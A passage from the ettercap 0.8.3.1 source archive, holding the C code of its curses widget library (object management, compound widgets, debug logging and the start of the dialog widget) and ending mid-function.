TAILQ_INSERT_TAIL(&wdg_objects_list, wl, next); /* this is the root object */ if (flags & WDG_OBJ_ROOT_OBJECT) wdg_root_obj = *wo; return WDG_E_SUCCESS; } /* * destroy a wdg object by calling the callback function */ int wdg_destroy_object(struct wdg_object **wo) { struct wdg_obj_list *wl; WDG_DEBUG_MSG("wdg_destroy_object (%p)", *wo); /* sanity check */ if (*wo == NULL) return -WDG_E_NOTHANDLED; /* delete it from the obj_list */ TAILQ_FOREACH(wl, &wdg_objects_list, next) { if (wl->wo == *wo) { /* was it the root object ? */ if ((*wo)->flags & WDG_OBJ_ROOT_OBJECT) wdg_root_obj = NULL; /* it was the focused one */ if (wdg_focused_obj && wdg_focused_obj->wo == *wo) { /* remove the modal flat to enable the switch */ (*wo)->flags &= ~WDG_OBJ_FOCUS_MODAL; wdg_switch_focus(SWITCH_BACKWARD); } /* * check if it was the only object in the list * and it has gained the focus with the previous * call to wdg_switch_focus(); */ if (wl == wdg_focused_obj) wdg_focused_obj = NULL; /* remove the object */ TAILQ_REMOVE(&wdg_objects_list, wl, next); WDG_SAFE_FREE(wl); /* call the specialized destroy function */ WDG_BUG_IF((*wo)->destroy == NULL); WDG_EXECUTE((*wo)->destroy, *wo); /* free the title */ WDG_SAFE_FREE((*wo)->title); /* then free the object */ WDG_SAFE_FREE(*wo); return WDG_E_SUCCESS; } } return -WDG_E_NOTHANDLED; } /* * set the destroy key and callback */ void wdg_add_destroy_key(struct wdg_object *wo, int key, void (*callback)(void)) { wo->destroy_key = key; wo->destroy_callback = callback; } /* * set or reset the size of an object */ void wdg_set_size(struct wdg_object *wo, int x1, int y1, int x2, int y2) { /* set the new object cohordinates */ wo->x1 = x1; wo->y1 = y1; wo->x2 = x2; wo->y2 = y2; /* call the specialized function */ WDG_BUG_IF(wo->resize == NULL); WDG_EXECUTE(wo->resize, wo); } /* * display the object by calling the redraw function */ void wdg_draw_object(struct wdg_object *wo) { WDG_DEBUG_MSG("wdg_draw_object (%p)", wo); /* display the object */ WDG_BUG_IF(wo->redraw == NULL); WDG_EXECUTE(wo->redraw, wo); } /* * return the type of the object */ size_t wdg_get_type(struct wdg_object *wo) { return wo->type; } /* * set the color of an object */ void wdg_set_color(wdg_t *wo, size_t part, u_char pair) { switch (part) { case WDG_COLOR_SCREEN: wo->screen_color = pair; break; case WDG_COLOR_TITLE: wo->title_color = pair; break; case WDG_COLOR_BORDER: wo->border_color = pair; break; case WDG_COLOR_FOCUS: wo->focus_color = pair; break; case WDG_COLOR_WINDOW: wo->window_color = pair; break; case WDG_COLOR_SELECT: wo->select_color = pair; break; } } /* * init a color pair */ void wdg_init_color(u_char pair, u_char fg, u_char bg) { init_pair(pair, fg, bg); } /* * erase the screen with the specified color */ void wdg_screen_color(u_char pair) { wbkgd(stdscr, COLOR_PAIR(pair)); erase(); refresh(); } /* * set the object's title */ void wdg_set_title(struct wdg_object *wo, char *title, size_t align) { /* copy the values */ wo->align = align; WDG_SAFE_STRDUP(wo->title, title); } /* * functions to calculate real dimensions * from the given relative cohordinates */ size_t wdg_get_nlines(struct wdg_object *wo) { size_t a, b; int c = current_screen.lines; if (wo->y1 >= 0) a = wo->y1; else a = (c + wo->y1 > 0) ? (c + wo->y1) : 0; if (wo->y2 > 0) b = wo->y2; else b = (c + wo->y2 > 0) ? (c + wo->y2) : 0; /* only return positive values */ return (b > a) ? b - a : 0; } size_t wdg_get_ncols(struct wdg_object *wo) { size_t a, b; int c = current_screen.cols; if (wo->x1 >= 0) a = wo->x1; else a = (c + wo->x1 > 0) ? (c + wo->x1) : 0; if (wo->x2 > 0) b = wo->x2; else b = (c + wo->x2 > 0) ? (c + wo->x2) : 0; /* only return positive values */ return (b > a) ? b - a : 0; } size_t wdg_get_begin_x(struct wdg_object *wo) { int c = current_screen.cols; if (wo->x1 >= 0) return wo->x1; else return (c + wo->x1 >= 0) ? (c + wo->x1) : 0; } size_t wdg_get_begin_y(struct wdg_object *wo) { int c = current_screen.lines; if (wo->y1 >= 0) return wo->y1; else return (c + wo->y1 >= 0) ? (c + wo->y1) : 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg.h000664 000000 000000 00000022526 13711276346 022307 0ustar00rootroot000000 000000 #ifndef WDG_H #define WDG_H #include #include #include #include #include #ifdef OS_WINDOWS #include #endif #ifdef OS_DARWIN #include #endif #include #include #define LIBWDG_VERSION "0.10.3" /********************************************/ enum { WDG_E_SUCCESS = 0, WDG_E_NOTHANDLED = 1, WDG_EFINISHED = 2, WDG_E_FATAL = 255, }; extern void wdg_debug_init(void); extern void wdg_debug_close(void); extern void wdg_debug_msg(const char *message, ...); #ifdef DEBUG #define WDG_DEBUG_INIT() wdg_debug_init() #define WDG_DEBUG_CLOSE() wdg_debug_close() #define WDG_DEBUG_MSG(x, ...) wdg_debug_msg(x, ## __VA_ARGS__ ) #else #define WDG_DEBUG_INIT() #define WDG_DEBUG_CLOSE() #define WDG_DEBUG_MSG(x, ...) #endif extern void wdg_error_msg(char *file, const char *function, int line, char *message, ...); #define WDG_ON_ERROR(x, y, fmt, ...) do { if (x == y) wdg_error_msg(__FILE__, __FUNCTION__, __LINE__, fmt, ## __VA_ARGS__ ); } while(0) extern void wdg_bug(char *file, const char *function, int line, char *message); #define WDG_BUG_IF(x) do { if (x) wdg_bug(__FILE__, __FUNCTION__, __LINE__, #x); }while(0) #define WDG_NOT_IMPLEMENTED() do { wdg_bug(__FILE__, __FUNCTION__, __LINE__, "Not yet implemented"); } while(0) #define WDG_SAFE_CALLOC(x, n, s) do { \ x = calloc(n, s); \ WDG_ON_ERROR(x, NULL, "virtual memory exhausted"); \ /* WDG_DEBUG_MSG("[%s:%d] WDG_SAFE_CALLOC: %#x", __FUNCTION__, __LINE__, x); */ \ } while(0) #define WDG_SAFE_REALLOC(x, s) do { \ /* WDG_DEBUG_MSG("[%s:%d] WDG_SAFE_REALLOC: before %#x", __FUNCTION__, __LINE__, x); */ \ x = realloc(x, s); \ WDG_ON_ERROR(x, NULL, "virtual memory exhausted"); \ /* WDG_DEBUG_MSG("[%s:%d] WDG_SAFE_REALLOC: after %#x", __FUNCTION__, __LINE__, x); */ \ } while(0) #define WDG_SAFE_FREE(x) do{ \ /* WDG_DEBUG_MSG("[%s:%d] WDG_SAFE_FREE: %#x", __FUNCTION__, __LINE__, x); */ \ if (x) { \ free(x); \ x = NULL; \ } \ }while(0) #define WDG_SAFE_STRDUP(x, s) do{ \ x = strdup(s); \ WDG_ON_ERROR(x, NULL, "virtual memory exhausted"); \ /* WDG_DEBUG_MSG("[%s:%d] WDG_SAFE_STRDUP: %#x", __FUNCTION__, __LINE__, x); */ \ }while(0) #define WDG_EXECUTE(x, ...) do{ if(x != NULL) x( __VA_ARGS__ ); }while(0) #define WDG_LOOP for(;;) /* used by halfdelay */ #define WDG_INPUT_TIMEOUT 1 /* not defined in curses.h */ #define KEY_RETURN '\r' #define KEY_TAB '\t' #define KEY_CTRL_L 12 #ifndef CTRL #define CTRL(x) ((x) & 0x1f) #endif #define KEY_ESC CTRL('[') #define KEY_DC 0512 /* delete-character key */ #define KEY_IC 0513 /* insert-character key */ /* information about the current screen */ struct wdg_scr { size_t lines; size_t cols; size_t flags; #define WDG_SCR_HAS_COLORS 1 #define WDG_SCR_INITIALIZED (1<<1) }; /* global scruct for current screen */ extern struct wdg_scr current_screen; /* struct for mouse events */ struct wdg_mouse_event { size_t x; size_t y; size_t event; }; #define WDG_MOUSE_ENCLOSE(win, key, mouse) (key == KEY_MOUSE && wenclose(win, mouse->y, mouse->x)) /* struct for all wdg objects */ struct wdg_object { /* object flags */ size_t flags; #define WDG_OBJ_WANT_FOCUS 1 #define WDG_OBJ_FOCUS_MODAL (1<<1) #define WDG_OBJ_FOCUSED (1<<2) #define WDG_OBJ_VISIBLE (1<<3) #define WDG_OBJ_ROOT_OBJECT (1<<7) /* object type */ size_t type; #define WDG_COMPOUND 0 #define WDG_WINDOW 1 #define WDG_PANEL 2 #define WDG_SCROLL 3 #define WDG_MENU 4 #define WDG_DIALOG 5 #define WDG_PERCENTAGE 6 #define WDG_FILE 7 #define WDG_INPUT 8 #define WDG_LIST 9 #define WDG_DYNLIST 10 /* destructor function */ int (*destroy)(struct wdg_object *wo); int destroy_key; void (*destroy_callback)(void); /* called to set / reset the size */ int (*resize)(struct wdg_object *wo); /* called upon redrawing of the object */ int (*redraw)(struct wdg_object *wo); /* get / lost focus redrawing functions */ int (*get_focus)(struct wdg_object *wo); int (*lost_focus)(struct wdg_object *wo); /* called to process an input from the user */ int (*get_msg)(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); /* object cohordinates */ int x1, y1, x2, y2; /* object colors */ u_char screen_color; u_char border_color; u_char focus_color; u_char title_color; u_char window_color; u_char select_color; /* title */ char *title; char align; /* here is the pointer to extend a wdg object * it is a sort of inheritance... */ void *extend; }; typedef struct wdg_object wdg_t; /* WIDGETS */ #define WDG_MOVE_PANEL(pan, y, x) do{ WDG_ON_ERROR(move_panel(pan, y, x), ERR, "Resized too much... (%d,%d)", x, y); }while(0) #define WDG_WRESIZE(win, l, c) do{ WDG_ON_ERROR(wresize(win, l, c), ERR, "Resized too much...(%dx%d)", c, l); }while(0) #define WDG_WO_EXT(type, var) type *var = (type *)(wo->extend) /* alignment */ #define WDG_ALIGN_LEFT 0 #define WDG_ALIGN_CENTER 1 #define WDG_ALIGN_RIGHT 2 /* compound ojbects */ extern void wdg_compound_add(wdg_t *wo, wdg_t *widget); extern void wdg_compound_set_focus(wdg_t *wo, wdg_t *widget); extern wdg_t * wdg_compound_get_focused(wdg_t *wo); void wdg_compound_add_callback(wdg_t *wo, int key, void (*callback)(void)); /* window ojbects */ extern void wdg_window_print(wdg_t *wo, size_t x, size_t y, char *fmt, ...); /* panel ojbects */ extern void wdg_panel_print(wdg_t *wo, size_t x, size_t y, char *fmt, ...); /* scroll ojbects */ extern void wdg_scroll_erase(wdg_t *wo); extern void wdg_scroll_print(wdg_t *wo, int color, char *fmt, ...); extern void wdg_scroll_set_lines(wdg_t *wo, size_t lines); /* menu objects */ struct wdg_menu { char *name; int hotkey; char *shortcut; void (*callback)(void); }; extern void wdg_menu_add(wdg_t *wo, struct wdg_menu *menu); /* dialog objects */ extern void wdg_dialog_text(wdg_t *wo, size_t flags, const char *text); #define WDG_NO_BUTTONS 0 #define WDG_OK 1 #define WDG_YES (1<<1) #define WDG_NO (1<<2) #define WDG_CANCEL (1<<3) extern void wdg_dialog_add_callback(wdg_t *wo, size_t flag, void (*callback)(void)); /* percentage objects */ extern int wdg_percentage_set(wdg_t *wo, size_t p, size_t max); #define WDG_PERCENTAGE_INTERRUPTED -1 #define WDG_PERCENTAGE_FINISHED 0 #define WDG_PERCENTAGE_UPDATED 1 /* file dialog objects */ extern void wdg_file_set_callback(wdg_t *wo, void (*callback)(const char *path, char *file)); /* input dialog objects */ extern void wdg_input_size(wdg_t *wo, size_t x, size_t y); extern void wdg_input_add(wdg_t *wo, size_t x, size_t y, const char *caption, char *buf, size_t len, size_t lines); extern void wdg_input_set_callback(wdg_t *wo, void (*callback)(void)); extern void wdg_input_get_input(wdg_t *wo); /* list objects */ struct wdg_list { char *desc; void *value; }; void wdg_list_set_elements(struct wdg_object *wo, struct wdg_list *list); void wdg_list_add_callback(wdg_t *wo, int key, void (*callback)(void *)); void wdg_list_refresh(wdg_t *wo); void wdg_list_select_callback(wdg_t *wo, void (*callback)(void *)); /* dynlist objects */ void wdg_dynlist_refresh(wdg_t *wo); void wdg_dynlist_add_callback(wdg_t *wo, int key, void (*callback)(void *)); void wdg_dynlist_print_callback(wdg_t *wo, void * func(int mode, void *list, char **desc, size_t len)); void wdg_dynlist_select_callback(wdg_t *wo, void (*callback)(void *)); void wdg_dynlist_reset(wdg_t *wo); /* EXPORTED FUNCTIONS */ extern void wdg_init(void); extern void wdg_cleanup(void); extern void wdg_exit(void); extern void wdg_update_screen(void); extern void wdg_redraw_all(void); /* the main dispatching loop */ extern int wdg_events_handler(int exit_key); /* add/delete functions to be called when idle */ extern void wdg_add_idle_callback(void (*callback)(void)); extern void wdg_del_idle_callback(void (*callback)(void)); /* object creation */ extern int wdg_create_object(wdg_t **wo, size_t type, size_t flags); extern int wdg_destroy_object(wdg_t **wo); extern void wdg_add_destroy_key(wdg_t *wo, int key, void (*callback)(void)); /* object modifications */ extern void wdg_set_size(wdg_t *wo, int x1, int y1, int x2, int y2); extern void wdg_set_colors(wdg_t *wo, int color, size_t type); extern void wdg_draw_object(wdg_t *wo); extern size_t wdg_get_type(wdg_t *wo); extern void wdg_set_focus(wdg_t *wo); extern void wdg_set_title(wdg_t *wo, char *title, size_t align); extern void wdg_init_color(u_char pair, u_char fg, u_char bg); extern void wdg_set_color(wdg_t *wo, size_t part, u_char pair); #define WDG_COLOR_SCREEN 0 #define WDG_COLOR_TITLE 1 #define WDG_COLOR_BORDER 2 #define WDG_COLOR_FOCUS 3 #define WDG_COLOR_WINDOW 4 #define WDG_COLOR_SELECT 5 extern void wdg_screen_color(u_char pair); /* object size */ extern size_t wdg_get_nlines(wdg_t *wo); extern size_t wdg_get_ncols(wdg_t *wo); extern size_t wdg_get_begin_x(wdg_t *wo); extern size_t wdg_get_begin_y(wdg_t *wo); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_compound.c000664 000000 000000 00000027100 13711276346 024177 0ustar00rootroot000000 000000 /* WDG -- compound widget (can contain other widgets) Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* GLOBALS */ struct wdg_compound_call { int key; void (*callback)(void); SLIST_ENTRY(wdg_compound_call) next; }; struct wdg_widget_list { struct wdg_object *wdg; TAILQ_ENTRY(wdg_widget_list) next; }; struct wdg_compound { WINDOW *win; struct wdg_widget_list *focused; TAILQ_HEAD(wtail, wdg_widget_list) widgets_list; SLIST_HEAD(, wdg_compound_call) callbacks; }; /* PROTOS */ void wdg_create_compound(struct wdg_object *wo); static int wdg_compound_destroy(struct wdg_object *wo); static int wdg_compound_resize(struct wdg_object *wo); static int wdg_compound_redraw(struct wdg_object *wo); static int wdg_compound_get_focus(struct wdg_object *wo); static int wdg_compound_lost_focus(struct wdg_object *wo); static int wdg_compound_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_compound_border(struct wdg_object *wo); static void wdg_compound_move(struct wdg_object *wo, int key); static int wdg_compound_dispatch(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); /*******************************************/ /* * called to create a compound */ void wdg_create_compound(struct wdg_object *wo) { struct wdg_compound *ww; WDG_DEBUG_MSG("wdg_create_compound"); /* set the callbacks */ wo->destroy = wdg_compound_destroy; wo->resize = wdg_compound_resize; wo->redraw = wdg_compound_redraw; wo->get_focus = wdg_compound_get_focus; wo->lost_focus = wdg_compound_lost_focus; wo->get_msg = wdg_compound_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_compound)); ww = (struct wdg_compound *)wo->extend; TAILQ_INIT(&ww->widgets_list); } /* * called to destroy a compound */ static int wdg_compound_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_compound, ww); struct wdg_widget_list *e, *tmp; struct wdg_compound_call *c; WDG_DEBUG_MSG("wdg_compound_destroy"); /* erase the window */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); wnoutrefresh(ww->win); /* dealloc the structures */ delwin(ww->win); /* destroy all the contained widgets */ TAILQ_FOREACH_SAFE(e, &(ww->widgets_list), next, tmp) { wdg_destroy_object(&e->wdg); WDG_SAFE_FREE(e); } /* free the callback list */ while (SLIST_FIRST(&ww->callbacks) != NULL) { c = SLIST_FIRST(&ww->callbacks); SLIST_REMOVE_HEAD(&ww->callbacks, next); WDG_SAFE_FREE(c); } WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize a compound */ static int wdg_compound_resize(struct wdg_object *wo) { wdg_compound_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw a compound (it redraws all the contained widgets) */ static int wdg_compound_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_compound, ww); struct wdg_widget_list *e; size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); WDG_DEBUG_MSG("wdg_compound_redraw"); /* the window already exist */ if (ww->win) { /* erase the border */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); touchwin(ww->win); wnoutrefresh(ww->win); /* resize the window and draw the new border */ mvwin(ww->win, y, x); wresize(ww->win, l, c); wdg_compound_border(wo); /* the first time we have to allocate the window */ } else { /* create the outher window */ if ((ww->win = newwin(l, c, y, x)) == NULL) return -WDG_E_FATAL; /* draw the borders */ wdg_compound_border(wo); } /* refresh the window */ redrawwin(ww->win); wnoutrefresh(ww->win); wo->flags |= WDG_OBJ_VISIBLE; /* redraw all the contained widget */ TAILQ_FOREACH(e, &(ww->widgets_list), next) { wdg_draw_object(e->wdg); } return WDG_E_SUCCESS; } /* * called when the compound gets the focus */ static int wdg_compound_get_focus(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_compound, ww); struct wdg_widget_list *e; /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* set the focus on the focused widget */ TAILQ_FOREACH(e, &(ww->widgets_list), next) { if (e == ww->focused) e->wdg->flags |= WDG_OBJ_FOCUSED; } /* redraw the window */ wdg_compound_redraw(wo); return WDG_E_SUCCESS; } /* * called when the compound looses the focus */ static int wdg_compound_lost_focus(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_compound, ww); struct wdg_widget_list *e; /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* remove the focus from the focused widget */ TAILQ_FOREACH(e, &(ww->widgets_list), next) { if (e == ww->focused) e->wdg->flags &= ~WDG_OBJ_FOCUSED; } /* redraw the window */ wdg_compound_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the compound is focused */ static int wdg_compound_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_compound, ww); struct wdg_widget_list *wl; /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(ww->win, mouse->y, mouse->x)) { wdg_set_focus(wo); /* dispatch to the proper widget */ TAILQ_FOREACH(wl, &ww->widgets_list, next) if (wl->wdg->get_msg(wl->wdg, key, mouse) == WDG_E_SUCCESS) { /* * the widget has handled the message, * set to the focused one */ ww->focused = wl; /* * regain focus to the compound * this is needed because it is always the * compound that must receive the messages */ wdg_set_focus(wo); } } else return -WDG_E_NOTHANDLED; break; /* move the focus */ case KEY_LEFT: case KEY_RIGHT: wdg_compound_move(wo, key); break; /* dispatch the message to the focused widget */ default: return wdg_compound_dispatch(wo, key, mouse); break; } return WDG_E_SUCCESS; } /* * move the focus thru the contained widgets */ static void wdg_compound_move(struct wdg_object *wo, int key) { WDG_WO_EXT(struct wdg_compound, ww); if (ww->focused == NULL) return; /* move the focus to the right widget */ if (key == KEY_LEFT) { WDG_DEBUG_MSG("wdg_compound_move: prev"); if (TAILQ_PREV(ww->focused, wtail, next) != NULL) { /* remove the focus from the current object */ ww->focused->wdg->flags &= ~WDG_OBJ_FOCUSED; ww->focused = TAILQ_PREV(ww->focused, wtail, next); /* give the focus to the new one */ ww->focused->wdg->flags |= WDG_OBJ_FOCUSED; } } else if (key == KEY_RIGHT) { WDG_DEBUG_MSG("wdg_compound_move: next"); if (TAILQ_NEXT(ww->focused, next) != NULL) { /* remove the focus from the current object */ ww->focused->wdg->flags &= ~WDG_OBJ_FOCUSED; ww->focused = TAILQ_NEXT(ww->focused, next); /* give the focus to the new one */ ww->focused->wdg->flags |= WDG_OBJ_FOCUSED; } } /* repaint the object */ wdg_compound_redraw(wo); } /* * dispatch the key to the focused widget */ static int wdg_compound_dispatch(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_compound, ww); struct wdg_compound_call *c; /* first: check if the key is linked to a callback */ SLIST_FOREACH(c, &ww->callbacks, next) { if (c->key == key) { WDG_DEBUG_MSG("wdg_compound_callback"); /* execute the callback */ WDG_EXECUTE(c->callback); return WDG_E_SUCCESS; } } /* pass the message to the focused widget */ return ww->focused->wdg->get_msg(ww->focused->wdg, key, mouse); } /* * draw the borders and title */ static void wdg_compound_border(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_compound, ww); size_t c = wdg_get_ncols(wo); /* the object was focused */ if (wo->flags & WDG_OBJ_FOCUSED) { wattron(ww->win, A_BOLD); wbkgdset(ww->win, COLOR_PAIR(wo->focus_color)); } else wbkgdset(ww->win, COLOR_PAIR(wo->border_color)); /* draw the borders */ box(ww->win, 0, 0); /* set the title color */ wbkgdset(ww->win, COLOR_PAIR(wo->title_color)); /* there is a title: print it */ if (wo->title) { switch (wo->align) { case WDG_ALIGN_LEFT: wmove(ww->win, 0, 3); break; case WDG_ALIGN_CENTER: wmove(ww->win, 0, (c - strlen(wo->title)) / 2); break; case WDG_ALIGN_RIGHT: wmove(ww->win, 0, c - strlen(wo->title) - 3); break; } wprintw(ww->win, wo->title); } /* restore the attribute */ if (wo->flags & WDG_OBJ_FOCUSED) wattroff(ww->win, A_BOLD); } /* * add a widget to the compound */ void wdg_compound_add(wdg_t *wo, wdg_t *widget) { WDG_WO_EXT(struct wdg_compound, ww); struct wdg_widget_list *e; WDG_SAFE_CALLOC(e, 1, sizeof(struct wdg_widget_list)); e->wdg = widget; TAILQ_INSERT_TAIL(&(ww->widgets_list), e, next); /* set the first focused widget */ if (ww->focused == NULL) ww->focused = e; } /* * set the focus on a widget contained in the compound */ void wdg_compound_set_focus(wdg_t *wo, wdg_t *widget) { WDG_WO_EXT(struct wdg_compound, ww); struct wdg_widget_list *e; TAILQ_FOREACH(e, &ww->widgets_list, next) { /* remove the focus from the current object */ if (e->wdg->flags & WDG_OBJ_FOCUSED) ww->focused->wdg->flags &= ~WDG_OBJ_FOCUSED; if (e->wdg == widget) { /* give the focus to the new one */ ww->focused->wdg->flags |= WDG_OBJ_FOCUSED; } } } /* * returns the current focused widget */ wdg_t * wdg_compound_get_focused(wdg_t *wo) { WDG_WO_EXT(struct wdg_compound, ww); struct wdg_widget_list *e; /* search and return the focused one */ TAILQ_FOREACH(e, &ww->widgets_list, next) if (e->wdg->flags & WDG_OBJ_FOCUSED) return e->wdg; return NULL; } /* * add the callback on key presse by the user */ void wdg_compound_add_callback(wdg_t *wo, int key, void (*callback)(void)) { WDG_WO_EXT(struct wdg_compound, ww); struct wdg_compound_call *c; WDG_SAFE_CALLOC(c, 1, sizeof(struct wdg_compound_call)); c->key = key; c->callback = callback; SLIST_INSERT_HEAD(&ww->callbacks, c, next); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_debug.c000664 000000 000000 00000005164 13711276346 023447 0ustar00rootroot000000 000000 /* WDG -- debug module Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #ifdef DEBUG #ifdef HAVE_NCURSES #include #endif #include /* globals */ FILE *wdg_debug_file = NULL; /**********************************/ void wdg_debug_init(void) { wdg_debug_file = fopen ("libwdg-"LIBWDG_VERSION"_debug.log", "w"); WDG_ON_ERROR(wdg_debug_file, NULL, "Couldn't open for writing %s", "libwdg-"LIBWDG_VERSION"_debug.log"); fprintf (wdg_debug_file, "\n==============================================================\n"); fprintf (wdg_debug_file, "\n-> libwdg %s\n\n", LIBWDG_VERSION); #if defined (__GNUC__) && defined (__GNUC_MINOR__) fprintf (wdg_debug_file, "-> compiled with gcc %d.%d (%s)\n", __GNUC__, __GNUC_MINOR__, CC_VERSION); #endif #if defined (__GLIBC__) && defined (__GLIBC_MINOR__) fprintf (wdg_debug_file, "-> glibc version %d.%d\n", __GLIBC__, __GLIBC_MINOR__); #endif #ifdef HAVE_NCURSES fprintf (wdg_debug_file, "-> %s\n", curses_version()); #endif fprintf (wdg_debug_file, "\n\nDEVICE OPENED FOR libwdg DEBUGGING\n\n"); fflush(wdg_debug_file); } void wdg_debug_close(void) { fprintf (wdg_debug_file, "\n\nDEVICE CLOSED FOR DEBUGGING\n\n"); fflush(wdg_debug_file); fclose (wdg_debug_file); /* set it to null and check from other threads */ wdg_debug_file = NULL; } void wdg_debug_msg(const char *message, ...) { va_list ap; char debug_message[strlen(message)+2]; /* if it was closed by another thread on exit */ if (wdg_debug_file == NULL) return; memset(debug_message, 0, sizeof(debug_message)); strncpy(debug_message, message, sizeof(debug_message) - 2); strcat(debug_message, "\n"); va_start(ap, message); vfprintf(wdg_debug_file, debug_message, ap); va_end(ap); fflush(wdg_debug_file); } #endif /* DEBUG */ /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_dialog.c000664 000000 000000 00000033261 13711276346 023617 0ustar00rootroot000000 000000 /* WDG -- dialog widget Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* GLOBALS */ struct wdg_button { char *label; char selected; void (*callback)(void); }; #define WDG_DIALOG_MAX_BUTTON 4 struct wdg_dialog { WINDOW *win; WINDOW *sub; size_t flags; char *text; size_t focus_button; struct wdg_button buttons[WDG_DIALOG_MAX_BUTTON]; }; /* PROTOS */ void wdg_create_dialog(struct wdg_object *wo); static int wdg_dialog_destroy(struct wdg_object *wo); static int wdg_dialog_resize(struct wdg_object *wo); static int wdg_dialog_redraw(struct wdg_object *wo); static int wdg_dialog_get_focus(struct wdg_object *wo); static int wdg_dialog_lost_focus(struct wdg_object *wo); static int wdg_dialog_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_dialog_border(struct wdg_object *wo); static void wdg_dialog_buttons(struct wdg_object *wo); static void wdg_dialog_get_size(struct wdg_object *wo, size_t *lines, size_t *cols); static void wdg_dialog_move(struct wdg_object *wo, int key); static int wdg_dialog_mouse_move(struct wdg_object *wo, struct wdg_mouse_event *mouse); static void wdg_dialog_callback(struct wdg_object *wo); /*******************************************/ /* * called to create a window */ void wdg_create_dialog(struct wdg_object *wo) { struct wdg_dialog *ww; WDG_DEBUG_MSG("wdg_create_dialog"); /* set the callbacks */ wo->destroy = wdg_dialog_destroy; wo->resize = wdg_dialog_resize; wo->redraw = wdg_dialog_redraw; wo->get_focus = wdg_dialog_get_focus; wo->lost_focus = wdg_dialog_lost_focus; wo->get_msg = wdg_dialog_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_dialog)); ww = (struct wdg_dialog *)wo->extend; /* initialize the labels, the other fields are zeroed by the calloc */ ww->buttons[0].label = " Ok "; ww->buttons[1].label = " Yes "; ww->buttons[2].label = " No "; ww->buttons[3].label = " Cancel "; } /* * called to destroy a window */ static int wdg_dialog_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_dialog, ww); WDG_DEBUG_MSG("wdg_dialog_destroy"); /* erase the window */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); wbkgd(ww->sub, COLOR_PAIR(wo->screen_color)); werase(ww->sub); werase(ww->win); wnoutrefresh(ww->sub); wnoutrefresh(ww->win); /* dealloc the structures */ delwin(ww->sub); delwin(ww->win); /* free the text string */ WDG_SAFE_FREE(ww->text); WDG_BUG_IF(ww->text != NULL); WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize a window */ static int wdg_dialog_resize(struct wdg_object *wo) { wdg_dialog_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw a window */ static int wdg_dialog_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_dialog, ww); size_t c, l, x, y; size_t lines, cols; WDG_DEBUG_MSG("wdg_dialog_redraw"); /* calculate the dimension and position */ wdg_dialog_get_size(wo, &lines, &cols); /* center on the screen, but not outside the edges */ if (cols + 4 >= current_screen.cols) wo->x1 = 0; else wo->x1 = (current_screen.cols - (cols + 4)) / 2; wo->y1 = (current_screen.lines - (lines + 4)) / 2; wo->x2 = -wo->x1; wo->y2 = -wo->y1; /* get the cohorditates as usual */ c = wdg_get_ncols(wo); l = wdg_get_nlines(wo); x = wdg_get_begin_x(wo); y = wdg_get_begin_y(wo); /* deal with rouding */ if (l != lines + 4) l = lines + 4; if (c != cols + 4) c = cols + 4; /* the window already exist */ if (ww->win) { /* erase the border */ wbkgd(ww->win, 